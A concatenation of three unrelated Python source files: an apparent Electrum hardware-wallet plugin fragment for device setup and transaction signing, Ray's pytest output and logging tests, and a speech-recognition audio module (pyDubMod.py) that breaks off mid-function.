pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise Exception(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True, keystore.is_segwit())
outputs = self.tx_outputs(keystore.get_derivation(), tx, keystore.is_segwit())
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
if type(wallet) is not Standard_Wallet:
keystore.handler.show_error(_('This function is only available for standard wallets when using {}.').format(self.device))
return
client = self.get_client(wallet.keystore)
if not client.atleast_version(1, 3):
wallet.keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = wallet.keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
segwit = wallet.keystore.is_segwit()
script_type = self.types.SPENDP2SHWITNESS if segwit else self.types.SPENDADDRESS
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
def tx_inputs(self, tx, for_sig=False, segwit=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = "\0"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
txinputtype.script_type = self.types.SPENDP2SHWITNESS if segwit else self.types.SPENDADDRESS
else:
def f(x_pubkey):
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
else:
xpub = xpub_from_pubkey(0, bfh(x_pubkey))
s = []
node = self.ckd_public.deserialize(xpub)
return self.types.HDNodePathType(node=node, address_n=s)
pubkeys = map(f, x_pubkeys)
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures')),
m=txin.get('num_sig'),
)
script_type = self.types.SPENDP2SHWITNESS if segwit else self.types.SPENDMULTISIG
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx, segwit=False):
def create_output_by_derivation(info):
index, xpubs, m = info
if len(xpubs) == 1:
script_type = self.types.PAYTOP2SHWITNESS if segwit else self.types.PAYTOADDRESS
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
script_type = self.types.PAYTOP2SHWITNESS if segwit else self.types.PAYTOMULTISIG
address_n = self.client_class.expand_path("/%d/%d" % index)
nodes = map(self.ckd_public.deserialize, xpubs)
pubkeys = [self.types.HDNodePathType(node=node, address_n=address_n) for node in nodes]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = address[2:]
elif _type == TYPE_ADDRESS:
if is_segwit_address(address):
txoutputtype.script_type = self.types.PAYTOWITNESS
else:
addrtype, hash_160 = b58_address_to_hash160(address)
if addrtype == constants.net.ADDRTYPE_P2PKH:
txoutputtype.script_type = self.types.PAYTOADDRESS
elif addrtype == constants.net.ADDRTYPE_P2SH:
txoutputtype.script_type = self.types.PAYTOSCRIPTHASH
else:
raise Exception('addrtype: ' + str(addrtype))
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for _type, address, amount in tx.outputs():
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation(info)
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for vout in d['outputs']:
o = t.bin_outputs.add()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
test_output.py
|
import subprocess
import sys
import pytest
import re
import signal
import time
import os
import ray
from ray._private.test_utils import (run_string_as_driver_nonblocking,
run_string_as_driver)
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_autoscaler_infeasible():
script = """
import ray
import time
ray.init(num_cpus=1)
@ray.remote(num_gpus=1)
def foo():
pass
x = foo.remote()
time.sleep(15)
"""
proc = run_string_as_driver_nonblocking(script)
out_str = proc.stdout.read().decode("ascii")
err_str = proc.stderr.read().decode("ascii")
print(out_str, err_str)
assert "Tip:" in out_str
assert "Error: No available node types can fulfill" in out_str
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_autoscaler_warn_deadlock():
script = """
import ray
import time
ray.init(num_cpus=1)
@ray.remote(num_cpus=1)
class A:
pass
a = A.remote()
b = A.remote()
time.sleep(25)
"""
proc = run_string_as_driver_nonblocking(script)
out_str = proc.stdout.read().decode("ascii")
err_str = proc.stderr.read().decode("ascii")
print(out_str, err_str)
assert "Tip:" in out_str
assert "Warning: The following resource request cannot" in out_str
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_autoscaler_no_spam():
script = """
import ray
import time
# Check that there are no false positives with custom resources.
ray.init(num_cpus=1, resources={"node:x": 1})
@ray.remote(num_cpus=1, resources={"node:x": 1})
def f():
time.sleep(1)
print("task done")
ray.get([f.remote() for _ in range(15)])
"""
proc = run_string_as_driver_nonblocking(script)
out_str = proc.stdout.read().decode("ascii")
err_str = proc.stderr.read().decode("ascii")
print(out_str, err_str)
assert "Tip:" not in out_str
assert "Tip:" not in err_str
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_fail_importing_actor(ray_start_regular, error_pubsub):
script = """
import os
import sys
import tempfile
import ray
ray.init()
temporary_python_file = '''
def temporary_helper_function():
return 1
'''
f = tempfile.NamedTemporaryFile(suffix=".py")
f.write(temporary_python_file.encode("ascii"))
f.flush()
directory = os.path.dirname(f.name)
# Get the module name and strip ".py" from the end.
module_name = os.path.basename(f.name)[:-3]
sys.path.append(directory)
module = __import__(module_name)
# Define an actor that closes over this temporary module. This should
# fail when it is unpickled.
@ray.remote
class Foo:
def __init__(self):
self.x = module.temporary_python_file()
a = Foo.remote()
"""
proc = run_string_as_driver_nonblocking(script)
out_str = proc.stdout.read().decode("ascii")
err_str = proc.stderr.read().decode("ascii")
print(out_str)
print(err_str)
assert "ModuleNotFoundError: No module named" in err_str
assert "RuntimeError: The actor with name Foo failed to import" in err_str
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_fail_importing_task(ray_start_regular, error_pubsub):
script = """
import os
import sys
import tempfile
import ray
ray.init()
temporary_python_file = '''
def temporary_helper_function():
return 1
'''
f = tempfile.NamedTemporaryFile(suffix=".py")
f.write(temporary_python_file.encode("ascii"))
f.flush()
directory = os.path.dirname(f.name)
# Get the module name and strip ".py" from the end.
module_name = os.path.basename(f.name)[:-3]
sys.path.append(directory)
module = __import__(module_name)
# Define an actor that closes over this temporary module. This should
# fail when it is unpickled.
@ray.remote
def foo():
return module.temporary_python_file()
ray.get(foo.remote())
"""
proc = run_string_as_driver_nonblocking(script)
out_str = proc.stdout.read().decode("ascii")
err_str = proc.stderr.read().decode("ascii")
print(out_str)
print(err_str)
assert "ModuleNotFoundError: No module named" in err_str
assert "RuntimeError: The remote function failed to import" in err_str
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_worker_stdout():
script = """
import ray
import sys
ray.init(num_cpus=2)
@ray.remote
def foo(out_str, err_str):
print(out_str)
print(err_str, file=sys.stderr)
ray.get(foo.remote("abc", "def"))
"""
proc = run_string_as_driver_nonblocking(script)
out_str = proc.stdout.read().decode("ascii")
err_str = proc.stderr.read().decode("ascii")
assert out_str.endswith("abc\n"), out_str
assert "(foo pid=" in out_str, out_str
assert err_str.split("\n")[-2].endswith("def")
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_core_worker_error_message():
script = """
import ray
import sys
ray.init(local_mode=True)
# In local mode this generates an ERROR level log.
ray._private.utils.push_error_to_driver(
ray.worker.global_worker, "type", "Hello there")
"""
proc = run_string_as_driver_nonblocking(script)
err_str = proc.stderr.read().decode("ascii")
assert "Hello there" in err_str, err_str
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_disable_driver_logs_breakpoint():
script = """
import time
import os
import ray
import sys
import threading
ray.init(num_cpus=2)
@ray.remote
def f():
while True:
time.sleep(1)
print("hello there")
sys.stdout.flush()
def kill():
time.sleep(5)
sys.stdout.flush()
time.sleep(1)
os._exit(0)
t = threading.Thread(target=kill)
t.start()
x = f.remote()
time.sleep(2) # Enough time to print one hello.
ray.util.rpdb._driver_set_trace() # This should disable worker logs.
# breakpoint() # Only works in Py3.7+
"""
proc = run_string_as_driver_nonblocking(script)
out_str = proc.stdout.read().decode("ascii")
num_hello = out_str.count("hello")
assert num_hello >= 1, out_str
assert num_hello < 3, out_str
assert "Temporarily disabling Ray worker logs" in out_str, out_str
# TODO(ekl) nice to test resuming logs too, but it's quite complicated
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
@pytest.mark.parametrize("file", ["stdout", "stderr"])
def test_multi_stdout_err(file):
if file == "stdout":
file_handle = "sys.stdout"
else: # sys.stderr
file_handle = "sys.stderr"
script = f"""
import ray
import sys
ray.init(num_cpus=1)
@ray.remote
def foo():
print(file={file_handle})
@ray.remote
def bar():
print(file={file_handle})
@ray.remote
def baz():
print(file={file_handle})
ray.get(foo.remote())
ray.get(bar.remote())
ray.get(baz.remote())
"""
proc = run_string_as_driver_nonblocking(script)
if file == "stdout":
out_str = proc.stdout.read().decode("ascii")
else:
out_str = proc.stderr.read().decode("ascii")
assert "(foo pid=" in out_str, out_str
assert "(bar pid=" in out_str, out_str
assert "(baz pid=" in out_str, out_str
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
@pytest.mark.parametrize("file", ["stdout", "stderr"])
def test_actor_stdout(file):
if file == "stdout":
file_handle = "sys.stdout"
else: # sys.stderr
file_handle = "sys.stderr"
script = f"""
import ray
import sys
ray.init(num_cpus=2)
@ray.remote
class Actor1:
def f(self):
print("hi", file={file_handle})
@ray.remote
class Actor2:
def __init__(self):
print("init", file={file_handle})
self.name = "ActorX"
def f(self):
print("bye", file={file_handle})
def __repr__(self):
return self.name
a = Actor1.remote()
ray.get(a.f.remote())
b = Actor2.remote()
ray.get(b.f.remote())
"""
proc = run_string_as_driver_nonblocking(script)
if file == "stdout":
out_str = proc.stdout.read().decode("ascii")
else:
out_str = proc.stderr.read().decode("ascii")
print(out_str)
assert "hi" in out_str, out_str
assert "(Actor1 pid=" in out_str, out_str
assert "bye" in out_str, out_str
assert re.search("Actor2 pid=.*init", out_str), out_str
assert not re.search("ActorX pid=.*init", out_str), out_str
assert re.search("ActorX pid=.*bye", out_str), out_str
assert not re.search("Actor2 pid=.*bye", out_str), out_str
def test_output():
# Use subprocess to execute the __main__ below.
outputs = subprocess.check_output(
[sys.executable, __file__, "_ray_instance"],
stderr=subprocess.STDOUT).decode()
lines = outputs.split("\n")
for line in lines:
print(line)
if os.environ.get("RAY_MINIMAL") == "1":
# Without "View the Ray dashboard"
assert len(lines) == 1, lines
else:
# With "View the Ray dashboard"
assert len(lines) == 2, lines
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
# TODO: fix this test to support minimal installation
@pytest.mark.skipif(
os.environ.get("RAY_MINIMAL") == "1",
reason="This test currently fails with minimal install.")
def test_output_on_driver_shutdown(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(num_cpus=16)
# many_ppo.py script.
script = """
import ray
from ray.tune import run_experiments
from ray.tune.utils.release_test_util import ProgressCallback
num_redis_shards = 5
redis_max_memory = 10**8
object_store_memory = 10**9
num_nodes = 3
message = ("Make sure there is enough memory on this machine to run this "
"workload. We divide the system memory by 2 to provide a buffer.")
assert (num_nodes * object_store_memory + num_redis_shards * redis_max_memory <
ray._private.utils.get_system_memory() / 2), message
# Simulate a cluster on one machine.
ray.init(address="auto")
# Run the workload.
run_experiments(
{
"ppo": {
"run": "PPO",
"env": "CartPole-v0",
"num_samples": 10,
"config": {
"framework": "torch",
"num_workers": 1,
"num_gpus": 0,
"num_sgd_iter": 1,
},
"stop": {
"timesteps_total": 1,
},
}
},
callbacks=[ProgressCallback()])
"""
proc = run_string_as_driver_nonblocking(script)
# Make sure the script is running before sending a sigterm.
with pytest.raises(subprocess.TimeoutExpired):
print(proc.wait(timeout=10))
print(f"Script is running... pid: {proc.pid}")
# Send multiple signals to terminate it like real world scenario.
for _ in range(10):
time.sleep(0.1)
os.kill(proc.pid, signal.SIGINT)
try:
proc.wait(timeout=10)
except subprocess.TimeoutExpired:
print("Script wasn't terminated by SIGINT. Try SIGTERM.")
os.kill(proc.pid, signal.SIGTERM)
print(proc.wait(timeout=10))
err_str = proc.stderr.read().decode("ascii")
assert len(err_str) > 0
assert "StackTrace Information" not in err_str
print(err_str)
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
@pytest.mark.skipif(
os.environ.get("RAY_MINIMAL") == "1",
reason="This test currently fails with minimal install.")
@pytest.mark.parametrize("execution_number", range(3))
def test_empty_line_thread_safety_bug(execution_number, ray_start_cluster):
"""Make sure when new threads are used within __init__,
the empty line is not printed.
Related: https://github.com/ray-project/ray/pull/20987
"""
cluster = ray_start_cluster
cluster.add_node(num_cpus=24)
actor_repr = "TESTER"
script = f"""
import time
import os
import threading
import torch
from filelock import FileLock
import ray
class Repro:
pass
def do_lock():
path = f"/tmp/lock"
lock = FileLock(path, timeout=4)
lock.acquire()
@ray.remote
class Train:
def __init__(self, config: Repro):
# print("b")
def warmup():
do_lock()
torch.empty(0, device="cpu")
for _ in range(300000000):
pass
threading.Thread(target=warmup, daemon=True).start()
def ready(self):
pass
def __repr__(self):
return "{actor_repr}"
ray.init("auto")
actors = [Train.remote(config=None) for i in range(24)]
for a in actors:
ray.get(a.ready.remote())
time.sleep(5)
"""
out = run_string_as_driver(script)
assert actor_repr not in out
if __name__ == "__main__":
if len(sys.argv) > 1 and sys.argv[1] == "_ray_instance":
# Set object store memory very low so that it won't complain
# about low shm memory in Linux environment.
# The test failures currently complain it only has 2 GB memory,
# so let's set it much lower than that.
MB = 1000**2
ray.init(num_cpus=1, object_store_memory=(100 * MB))
ray.shutdown()
else:
sys.exit(pytest.main(["-v", __file__]))
|
pyDubMod.py
|
#pydub imports
import os
from requests import Request
import requests
import json
import uuid
import string
from pydub import AudioSegment
import io, subprocess, wave, aifc, base64
import math, audioop, collections, threading
import platform, stat, random, uuid
# define exceptions
class TimeoutError(Exception): pass
class RequestError(Exception): pass
class UnknownValueError(Exception): pass
class AudioSource(object):
def __init__(self):
raise NotImplementedError("this is an abstract class")
def __enter__(self):
raise NotImplementedError("this is an abstract class")
def __exit__(self, exc_type, exc_value, traceback):
raise NotImplementedError("this is an abstract class")
class AudioFile(AudioSource):
"""
Creates a new ``AudioFile`` instance given a WAV/AIFF/FLAC audio file `filename_or_fileobject`. Subclass of ``AudioSource``.
If ``filename_or_fileobject`` is a string, then it is interpreted as a path to an audio file on the filesystem. Otherwise, ``filename_or_fileobject`` should be a file-like object such as ``io.BytesIO`` or similar.
Note that functions that read from the audio (such as ``recognizer_instance.record`` or ``recognizer_instance.listen``) will move ahead in the stream. For example, if you execute ``recognizer_instance.record(audiofile_instance, duration=10)`` twice, the first time it will return the first 10 seconds of audio, and the second time it will return the 10 seconds of audio right after that. This is always reset to the beginning when entering an ``AudioFile`` context.
WAV files must be in PCM/LPCM format; WAVE_FORMAT_EXTENSIBLE and compressed WAV are not supported and may result in undefined behaviour.
Both AIFF and AIFF-C (compressed AIFF) formats are supported.
FLAC files must be in native FLAC format; OGG-FLAC is not supported and may result in undefined behaviour.
"""
def __init__(self, filename_or_fileobject):
if str is bytes: # Python 2 - if a file path is specified, it must either be a `str` instance or a `unicode` instance
assert isinstance(filename_or_fileobject, (str, unicode)) or hasattr(filename_or_fileobject, "read"), "Given audio file must be a filename string or a file-like object"
else: # Python 3 - if a file path is specified, it must be a `str` instance
assert isinstance(filename_or_fileobject, str) or hasattr(filename_or_fileobject, "read"), "Given audio file must be a filename string or a file-like object"
self.filename_or_fileobject = filename_or_fileobject
self.stream = None
self.DURATION = None
def __enter__(self):
assert self.stream is None, "This audio source is already inside a context manager"
try:
# attempt to read the file as WAV
self.audio_reader = wave.open(self.filename_or_fileobject, "rb")
self.little_endian = True # RIFF WAV is a little-endian format (most ``audioop`` operations assume that the frames are stored in little-endian form)
except wave.Error:
try:
# attempt to read the file as AIFF
self.audio_reader = aifc.open(self.filename_or_fileobject, "rb")
self.little_endian = False # AIFF is a big-endian format
except aifc.Error:
# attempt to read the file as FLAC
if hasattr(self.filename_or_fileobject, "read"):
flac_data = self.filename_or_fileobject.read()
else:
with open(self.filename_or_fileobject, "rb") as f: flac_data = f.read()
# run the FLAC converter with the FLAC data to get the AIFF data
flac_converter = get_flac_converter()
process = subprocess.Popen([
flac_converter,
"--stdout", "--totally-silent", # put the resulting AIFF file in stdout, and make sure it's not mixed with any program output
"--decode", "--force-aiff-format", # decode the FLAC file into an AIFF file
"-", # the input FLAC file contents will be given in stdin
], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
aiff_data, stderr = process.communicate(flac_data)
aiff_file = io.BytesIO(aiff_data)
try:
self.audio_reader = aifc.open(aiff_file, "rb")
except aifc.Error:
assert False, "Audio file could not be read as WAV, AIFF, or FLAC; check if file is corrupted"
self.little_endian = False # AIFF is a big-endian format
assert 1 <= self.audio_reader.getnchannels() <= 2, "Audio must be mono or stereo"
self.SAMPLE_WIDTH = self.audio_reader.getsampwidth()
# 24-bit audio needs some special handling for old Python versions (workaround for https://bugs.python.org/issue12866)
samples_24_bit_pretending_to_be_32_bit = False
if self.SAMPLE_WIDTH == 3: # 24-bit audio
try: audioop.bias(b"", self.SAMPLE_WIDTH, 0) # test whether this sample width is supported (for example, ``audioop`` in Python 3.3 and below don't support sample width 3, while Python 3.4+ do)
except audioop.error: # this version of audioop doesn't support 24-bit audio (probably Python 3.3 or less)
samples_24_bit_pretending_to_be_32_bit = True # while the ``AudioFile`` instance will outwardly appear to be 32-bit, it will actually internally be 24-bit
self.SAMPLE_WIDTH = 4 # the ``AudioFile`` instance should present itself as a 32-bit stream now, since we'll be converting into 32-bit on the fly when reading
self.SAMPLE_RATE = self.audio_reader.getframerate()
self.CHUNK = 4096
self.FRAME_COUNT = self.audio_reader.getnframes()
self.DURATION = self.FRAME_COUNT / float(self.SAMPLE_RATE)
self.stream = AudioFile.AudioFileStream(self.audio_reader, self.little_endian, samples_24_bit_pretending_to_be_32_bit)
return self
def __exit__(self, exc_type, exc_value, traceback):
if not hasattr(self.filename_or_fileobject, "read"): # only close the file if it was opened by this class in the first place (if the file was originally given as a path)
self.audio_reader.close()
self.stream = None
self.DURATION = None
class AudioFileStream(object):
def __init__(self, audio_reader, little_endian, samples_24_bit_pretending_to_be_32_bit):
self.audio_reader = audio_reader # an audio file object (e.g., a `wave.Wave_read` instance)
self.little_endian = little_endian # whether the audio data is little-endian (when working with big-endian things, we'll have to convert it to little-endian before we process it)
self.samples_24_bit_pretending_to_be_32_bit = samples_24_bit_pretending_to_be_32_bit # this is true if the audio is 24-bit audio, but 24-bit audio isn't supported, so we have to pretend that this is 32-bit audio and convert it on the fly
def read(self, size = -1):
buffer = self.audio_reader.readframes(self.audio_reader.getnframes() if size == -1 else size)
if not isinstance(buffer, bytes): buffer = b"" # workaround for https://bugs.python.org/issue24608
sample_width = self.audio_reader.getsampwidth()
if not self.little_endian: # big endian format, convert to little endian on the fly
if hasattr(audioop, "byteswap"): # ``audioop.byteswap`` was only added in Python 3.4 (incidentally, that also means that we don't need to worry about 24-bit audio being unsupported, since Python 3.4+ always has that functionality)
buffer = audioop.byteswap(buffer, sample_width)
else: # manually reverse the bytes of each sample, which is slower but works well enough as a fallback
buffer = buffer[sample_width - 1::-1] + b"".join(buffer[i + sample_width:i:-1] for i in range(sample_width - 1, len(buffer), sample_width))
# workaround for https://bugs.python.org/issue12866
if self.samples_24_bit_pretending_to_be_32_bit: # we need to convert samples from 24-bit to 32-bit before we can process them with ``audioop`` functions
buffer = b"".join("\x00" + buffer[i:i + sample_width] for i in range(0, len(buffer), sample_width)) # since we're in little endian, we prepend a zero byte to each 24-bit sample to get a 32-bit sample
if self.audio_reader.getnchannels() != 1: # stereo audio
buffer = audioop.tomono(buffer, sample_width, 1, 1) # convert stereo audio data to mono
return buffer
class AudioData(object):
def __init__(self, frame_data, sample_rate, sample_width):
assert sample_rate > 0, "Sample rate must be a positive integer"
assert sample_width % 1 == 0 and 1 <= sample_width <= 4, "Sample width must be between 1 and 4 inclusive"
self.frame_data = frame_data
self.sample_rate = sample_rate
self.sample_width = int(sample_width)
def get_raw_data(self, convert_rate = None, convert_width = None):
"""
Returns a byte string representing the raw frame data for the audio represented by the ``AudioData`` instance.
If ``convert_rate`` is specified and the audio sample rate is not ``convert_rate`` Hz, the resulting audio is resampled to match.
If ``convert_width`` is specified and the audio samples are not ``convert_width`` bytes each, the resulting audio is converted to match.
Writing these bytes directly to a file results in a valid `RAW/PCM audio file <https://en.wikipedia.org/wiki/Raw_audio_format>`__.
"""
assert convert_rate is None or convert_rate > 0, "Sample rate to convert to must be a positive integer"
assert convert_width is None or (convert_width % 1 == 0 and 1 <= convert_width <= 4), "Sample width to convert to must be between 1 and 4 inclusive"
raw_data = self.frame_data
# make sure unsigned 8-bit audio (which uses unsigned samples) is handled like higher sample width audio (which uses signed samples)
if self.sample_width == 1:
raw_data = audioop.bias(raw_data, 1, -128) # subtract 128 from every sample to make them act like signed samples
# resample audio at the desired rate if specified
if convert_rate is not None and self.sample_rate != convert_rate:
raw_data, _ = audioop.ratecv(raw_data, self.sample_width, 1, self.sample_rate, convert_rate, None)
# convert samples to desired sample width if specified
if convert_width is not None and self.sample_width != convert_width:
if convert_width == 3: # we're converting the audio into 24-bit (workaround for https://bugs.python.org/issue12866)
raw_data = audioop.lin2lin(raw_data, self.sample_width, 4) # convert audio into 32-bit first, which is always supported
try: audioop.bias(b"", 3, 0) # test whether 24-bit audio is supported (for example, ``audioop`` in Python 3.3 and below don't support sample width 3, while Python 3.4+ do)
except audioop.error: # this version of audioop doesn't support 24-bit audio (probably Python 3.3 or less)
raw_data = b"".join(raw_data[i + 1:i + 4] for i in range(0, len(raw_data), 4)) # since we're in little endian, we discard the first byte from each 32-bit sample to get a 24-bit sample
else: # 24-bit audio fully supported, we don't need to shim anything
raw_data = audioop.lin2lin(raw_data, self.sample_width, convert_width)
else:
raw_data = audioop.lin2lin(raw_data, self.sample_width, convert_width)
# if the output is 8-bit audio with unsigned samples, convert the samples we've been treating as signed to unsigned again
if convert_width == 1:
raw_data = audioop.bias(raw_data, 1, 128) # add 128 to every sample to make them act like unsigned samples again
return raw_data
def get_wav_data(self, convert_rate = None, convert_width = None):
"""
Returns a byte string representing the contents of a WAV file containing the audio represented by the ``AudioData`` instance.
If ``convert_width`` is specified and the audio samples are not ``convert_width`` bytes each, the resulting audio is converted to match.
If ``convert_rate`` is specified and the audio sample rate is not ``convert_rate`` Hz, the resulting audio is resampled to match.
Writing these bytes directly to a file results in a valid `WAV file <https://en.wikipedia.org/wiki/WAV>`__.
"""
raw_data = self.get_raw_data(convert_rate, convert_width)
sample_rate = self.sample_rate if convert_rate is None else convert_rate
sample_width = self.sample_width if convert_width is None else convert_width
# generate the WAV file contents
with io.BytesIO() as wav_file:
wav_writer = wave.open(wav_file, "wb")
try: # note that we can't use context manager, since that was only added in Python 3.4
wav_writer.setframerate(sample_rate)
wav_writer.setsampwidth(sample_width)
wav_writer.setnchannels(1)
wav_writer.writeframes(raw_data)
wav_data = wav_file.getvalue()
finally: # make sure resources are cleaned up
wav_writer.close()
return wav_data
class Recognizer(AudioSource):
def __init__(self):
"""
Creates a new ``Recognizer`` instance, which represents a collection of speech recognition functionality.
"""
self.energy_threshold = 300 # minimum audio energy to consider for recording
self.dynamic_energy_threshold = True
self.dynamic_energy_adjustment_damping = 0.15
self.dynamic_energy_ratio = 1.5
self.pause_threshold = 0.8 # seconds of non-speaking audio before a phrase is considered complete
self.phrase_threshold = 0.3 # minimum seconds of speaking audio before we consider the speaking audio a phrase - values below this are ignored (for filtering out clicks and pops)
self.non_speaking_duration = 0.5 # seconds of non-speaking audio to keep on both sides of the recording
def record(self, source, duration = None, offset = None):
"""
Records up to ``duration`` seconds of audio from ``source`` (an ``AudioSource`` instance) starting at ``offset`` (or at the beginning if not specified) into an ``AudioData`` instance, which it returns.
If ``duration`` is not specified, then it will record until there is no more audio input.
"""
assert isinstance(source, AudioSource), "Source must be an audio source"
assert source.stream is not None, "Audio source must be entered before recording, see documentation for `AudioSource`; are you using `source` outside of a `with` statement?"
frames = io.BytesIO()
seconds_per_buffer = (source.CHUNK + 0.0) / source.SAMPLE_RATE
elapsed_time = 0
offset_time = 0
offset_reached = False
while True: # loop for the total number of chunks needed
if offset and not offset_reached:
offset_time += seconds_per_buffer
if offset_time > offset:
offset_reached = True
buffer = source.stream.read(source.CHUNK)
if len(buffer) == 0: break
if offset_reached or not offset:
elapsed_time += seconds_per_buffer
if duration and elapsed_time > duration: break
frames.write(buffer)
frame_data = frames.getvalue()
frames.close()
return AudioData(frame_data, source.SAMPLE_RATE, source.SAMPLE_WIDTH)
def adjust_for_ambient_noise(self, source, duration = 1):
"""
Adjusts the energy threshold dynamically using audio from ``source`` (an ``AudioSource`` instance) to account for ambient noise.
Intended to calibrate the energy threshold with the ambient energy level. Should be used on periods of audio without speech - will stop early if any speech is detected.
The ``duration`` parameter is the maximum number of seconds that it will dynamically adjust the threshold for before returning. This value should be at least 0.5 in order to get a representative sample of the ambient noise.
"""
assert isinstance(source, AudioSource), "Source must be an audio source"
assert source.stream is not None, "Audio source must be entered before adjusting, see documentation for `AudioSource`; are you using `source` outside of a `with` statement?"
assert self.pause_threshold >= self.non_speaking_duration >= 0
seconds_per_buffer = (source.CHUNK + 0.0) / source.SAMPLE_RATE
elapsed_time = 0
# adjust energy threshold until a phrase starts
while True:
elapsed_time += seconds_per_buffer
if elapsed_time > duration: break
buffer = source.stream.read(source.CHUNK)
energy = audioop.rms(buffer, source.SAMPLE_WIDTH) # energy of the audio signal
# dynamically adjust the energy threshold using assymmetric weighted average
damping = self.dynamic_energy_adjustment_damping ** seconds_per_buffer # account for different chunk sizes and rates
target_energy = energy * self.dynamic_energy_ratio
self.energy_threshold = self.energy_threshold * damping + target_energy * (1 - damping)
def listen(self, source, timeout = None):
"""
Records a single phrase from ``source`` (an ``AudioSource`` instance) into an ``AudioData`` instance, which it returns.
This is done by waiting until the audio has an energy above ``recognizer_instance.energy_threshold`` (the user has started speaking), and then recording until it encounters ``recognizer_instance.pause_threshold`` seconds of non-speaking or there is no more audio input. The ending silence is not included.
